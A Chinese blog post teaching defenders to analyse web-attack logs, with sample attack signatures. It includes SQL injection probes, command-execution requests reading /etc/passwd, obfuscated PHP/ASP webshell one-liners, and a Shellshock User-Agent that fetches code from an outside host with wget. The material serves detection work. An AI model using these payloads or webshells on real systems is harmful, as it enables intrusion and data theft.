日志分析简单总结

news2024/12/23 13:29:11

1、分析日志的目的

误报:不是攻击而上报成攻击
漏报:是攻击而没有防御的情况
日志分析可以判断是否误判或者漏判,可以溯源攻击行为
在护网作为防守方必备的技能(分析NGAF和态势感知,发现异常)

2、攻击出现的位置

Get、post 请求报文的url字段

•Get 、post请求 URL参数涉及到的攻击
•xss攻击
•SQL注入
•命令执行
•文件包含
•目录穿越
•webshell
•信息泄露
•网站扫描
cookie字段、referer字段、post表单字段和url请求类似


Get 、post请求报文的cookie字段


Get、post请求报文的referer字段


Post请求报文的表单字段

user-agent部分
•恶意爬虫:Python-urllib/2.6、Baidu-YunGuanCe-ScanBot(ce.baidu.com)
•扫描器:morfeus fucking scanner、 Accept:acunetix/wvs
•sql注入漏洞:sqlmap/1.0.8.15#dev (http://sqlmap.org)
•xss攻击:'%22()%26%25<ScRiPt%20>prompt(961668)</ScRiPt>
•其它非常特殊攻击 :User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget
-q -c http://lliillii.altervista.org/io.php 0<&1 2>&1


Get 、post请求报文的user-agent字段


Http应答页面

http报文负载

•webshell (请求和应答方向都可能)
•信息泄露(应答方向)

3、攻击常见的语句

sql注入命令

探测语句
•http://www.19cn.com/showdetail.asp?id=49 and 1=1
•http://www.19cn.com/showdetail.asp?id=49 or 1=1
•and char(124)%2Buser%2Bchar(124)=0 (注入类型判断)


权限判断
•and user>0 用户名
•and 1=(select IS_SRVROLEMEMBER('sysadmin')) 权限
•and exists (select * from sysobjects) 数据库类型判断sqlserver

查询数据

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 查库名
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 查表名
and (select count(字段名) from 表名)>0 猜字段
and (select top 1 len(username) from admin)=X 猜字段值
http://localhost/mytest/sqlinject/id=1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user
union select            猜解法
and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116

命令执行

GET /simple/tests/tmssql.php?do=phpinfo
GET /detail.php?id=/winnt/system32/cmd.exe?/c+dir+c:%5c
GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini
GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd

webshell

•<?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
•<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("123"))%>
•<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-lr+k-e+k-q+k-u+k-e+k-s+k-
t("c")%>(UTF-7编码格式的一句话木马)
•<?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-
*/{"P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);?>
•<%eval request("sb")%>
•<%execute request("sb")%>
•<?php eval($_POST[sb]);?>
•<?php @eval($_POST[sb]);?>
•<?$_POST['sa']($_POST['sb']);?>

信息泄露

配置文件访问
•httpd.conf
•htaccess
•HTPASSWD
•boot.ini
•etc/passwd
•Php.ini
•Web.xml

网站扫描

恶意爬虫
•浏览器的user-agent字段一般都比较固定如:
•User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;Trident/5.0) ——IE 9.0
•不是浏览器的user-agent ,很可能就是爬虫
扫描软件: user-agent字段或者单独标示自己的软件
•综合扫描器: wvs、 appscan
专用扫描器: sql注入

4、攻击常见的特点

攻击特点:
•攻击一般都有一定的连续性,所以一段时间会产生多条日志,并且命中特
征id是有一定分布的,不能是只命中某个特征。
•攻击一般都会借助工具进行,同一个IP地址日志间隔较小 ,可能一秒中产
生几条日志,明显不是人操作浏览器的行为。
•攻击者可能会借助一定跳板,如果IP地址是国外的,攻击嫌疑较大。

5、攻击日志分析流程

基于攻击IP地址方法分析(适用日志较多的情况)

•找出一个明显的攻击行为的日志
•根据该日志找出攻击源IP地址
•筛选出针对该IP地址的日志,这种情况下基本都是攻击,没有误报
•针对该IP地址,利用前面介绍的知识,就可以看出攻击者都发起了哪些攻

基于攻击方法分析(适用每类不太多的攻击)

看攻击语句,是否是明显攻击行为
如果能看出是明显的行为,就可以确定是攻击
如果不确定,还需要结合其他参数,
源IP地址 :是否出现过其他类型可以明确的攻击行为
攻击时间:如果半夜或者凌晨活动比较频繁 ,可以怀疑为攻击。
日志频率 :一秒中出现几次日志,可以怀疑为攻击。
攻击位置:国外的ip地址 ,可以怀疑为攻击
报文语义分析:比如访问admin文件夹 ,可能是有攻击行为
上述几个参数可以组合分析,进一步确定攻击

前面说的用户网站存在一定安全隐患是这种情况的一种
还有一种情况 ,用户的应用比较特殊,理论上所有规则都能误报
•用户是一个论坛类应用,可以提交任意东西,包括文章类
•用户是一个代码提交讨论网站,经常通过post表单提交代码
•这类应用主要体现在学校应用中较多

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1620149.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

芯科科技大大简化面向无电池物联网的能量采集产品的开发

芯科科技推出其迄今最高能量效率且支持能量采集功能的无线SoC 中国&#xff0c;北京 – 2024年4月22日 – 致力于以安全、智能无线连接技术&#xff0c;建立更互联世界的全球领导厂商Silicon Labs&#xff08;亦称“芯科科技”&#xff0c;NASDAQ&#xff1a;SLAB&#xff09;…

一个联合均值与方差模型的R包——dglm

目录 一、引言二、包的安装与载入三、模拟例子3.1 数据生成3.2 数据查看3.3 模型估计参数 一、引言 在 R 语言中&#xff0c;dglm 包是用于拟合双参数广义线性模型&#xff08;Double Generalized Linear Models&#xff0c;简称 DGLMs&#xff09;的一个工具。这类模型允许同…

fakak详解(2)

Kafka和Flume整合 Kafka与flume整合流程 Kafka整合flume流程图 flume主要是做日志数据(离线或实时)地采集。 图-21 数据处理 图-21显示的是flume采集完毕数据之后&#xff0c;进行的离线处理和实时处理两条业务线&#xff0c;现在再来学习flume和kafka的整合处理。 配置fl…

centos7使用源码安装方式redis

安装编译源码的工具gcc yum install -y gcc下载源码 源码下载地址 https://download.redis.io/releases/ 注意事项 不建议安装最新版本redis&#xff0c;所以我这里选择6.2.6版本 下载 wget https://download.redis.io/releases/redis-6.2.6.tar.gz解压 tar -zxvf redis-…

基于表面法线法的二维人脸图构建三维人脸模型matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 2.算法运行软件版本 matlab2022a 3.部分核心程序 ............................................................................for j 1 : …

Python基础进阶语法

目录&#xff1a; 一、基础语法二、进阶语法 一、基础语法 二、进阶语法 1、列表推导式运用 解析&#xff1a;先循环1到10内的数字&#xff0c;然后过滤大于5的数&#xff0c;赋值到new_list数组中进行打印结果。

数字信号处理操作教程_音频解码:3-8 G711A音频解码实验

一、实验目的 学习G711音频的格式和G711A音频解码的原理&#xff0c;并实现将BIT格式解码为PCM格式。 二、实验原理 G711 G711是国际电信联盟订定出来的一套语音压缩标准&#xff0c;主要用于电话。它主要用脉冲编码调制对音频采样&#xff0c;采样率为8k每秒。它利用一个 …

VUE2版本的仿微信通讯录侧滑列表

<template><!-- Vue模板部分 --><div><div v-for"(group, index) in groupedArray" :key"index" ref"indexcatch"><h2>{{ letter[index] }}</h2><ul><li v-for"item in group" :key&quo…

什么因素可以影响到代理IP稳定性?爬虫代理IP有哪些作用?

一、什么因素可以影响到代理IP稳定性 代理IP的稳定性受到多种因素的影响&#xff0c;以下是一些主要的因素&#xff1a; 代理IP的质量&#xff1a;不同的代理IP提供商提供的代理IP质量参差不齐&#xff0c;一些低质量的代理IP可能经常出现连接问题或速度慢的情况&#xff0c;…

Day:动态规划 LeedCode 123.买卖股票的最佳时机III 188.买卖股票的最佳时机IV

123. 买卖股票的最佳时机 III 给定一个数组&#xff0c;它的第 i 个元素是一支给定的股票在第 i 天的价格。 设计一个算法来计算你所能获取的最大利润。你最多可以完成 两笔 交易。 注意&#xff1a;你不能同时参与多笔交易&#xff08;你必须在再次购买前出售掉之前的股票&a…

解码数据世界:统计学入门与应用指南

引言 统计学可以被定义为研究数据的科学&#xff0c;它涉及到数据的收集、分析、解释和呈现。其目标是从数据中提取有意义的信息&#xff0c;并使用这些信息来做出推断与决策。 统计学主要分别以下几个主要领域&#xff1a; 描述性统计&#xff1a;使用图表、图形和其他工具…

C++之入门

文章目录 1、前言2、C的关键字2.1C语言32关键字2.2C关键字(63个) 3、命名空间4、输入输出(cout、cin)4、缺省参数5、函数重载6 引用6.1 引用的定义6.2 引用的特性6.3引用的使用场景6.4 实际例子6.5、总结 7、内联函数8、auto关键字9、nullptr关键字 1、前言 C语言是结构化和模…

【声呐仿真】学习记录0-服务器配置docker、ros环境

【声呐仿真】学习记录0-服务器配置docker、ros环境 前言一、~~0.设置mobaXterm~~1.拉取镜像2.服务器开启xhost&#xff0c;可视化&#xff08;rviz、gazebo&#xff09;3.创建容器&#xff0c;挂载数据卷4.测试宿主机与容器数据是否同步5.测试5.0测试xclock5.1测试ros小乌龟5.2…

算术表达式计算程序:Python语言实现

算术表达式计算程序&#xff1a;Python语言实现 本文介绍通过Python语言实现算术表达式计算程序的过程。 我们将按照软件工程的基本步骤来介绍&#xff1a; 需求分析设计实现 程序的需求 我们的程序具有如下功能&#xff1a; 用户在提示符下输入一个算术表达式&#xff0…

碰到今日伦敦银价格走势图不懂得分析怎么办?

踏入2024年&#xff0c;伦敦银出现了比往年更多的投资机会&#xff0c;尤其是近期伦敦银价格连续上涨突破多个整数关口&#xff0c;现在已经站在28上方。碰到这么强的走势&#xff0c;投资者自然很想快点入场交易。但是交易前投资者需要分析今日伦敦银价格走势图之后再入场&…

ffmpeg支持MP3编码的方法

目录 现象 解决办法 如果有编译包没有链接上的情况 现象 解决办法 在ffmpeg安装包目录下 &#xff0c;通过./configure --list-encoders 和 ./configure --list-decoders 命令可以看到&#xff0c;ffmpeg只支持mp3解码&#xff0c;但是不支持mp3编码。 上网查寻后发现&…

idm序列号永久激活码2023免费可用 IDM软件破解版下载 最新版Internet Download Manager 网络下载加速必备神器 IDM设置中文

IDM是一款多线程下载工具&#xff0c;全称Internet Download Manager。IDM的多线程加速功能&#xff0c;能够充分利用宽带&#xff0c;所以下载速度会比较快&#xff0c;而且它支持断点续传。它的网站音视频捕获、站点抓取、静默下载等功能&#xff0c;也特别实用。 idm使用技…

SS34B-ASEMI超低Low VF肖特基SS34B

编辑&#xff1a;ll SS34B-ASEMI超低Low VF肖特基SS34B 型号&#xff1a;SS34B 品牌&#xff1a;ASEMI 封装&#xff1a;SMB 最大平均正向电流&#xff08;IF&#xff09;&#xff1a;3A 最大循环峰值反向电压&#xff08;VRRM&#xff09;&#xff1a;40V 最大正向电压…

hyperf 三十一 极简DB组件

一 安装及配置 composer require hyperf/db php bin/hyperf.php vendor:publish hyperf/db 默认配置 config/autoload/db.php 如下&#xff0c;数据库支持多库配置&#xff0c;默认为 default。 配置项类型默认值备注driverstring无数据库引擎 支持 pdo 和 mysqlhoststringl…

线程安全以及解决方案

文章目录 1.线程安全的原因①抢占式执行②多线程修改同一个变量③修改的操作不是原子的④内存可见性⑤指令重排序 2. 线程安全的解决方案3 synchronized的特性------可重入锁 1.线程安全的原因 ①抢占式执行 操作系统对线程的调度是随机的&#xff0c;没有规律&#xff08;主…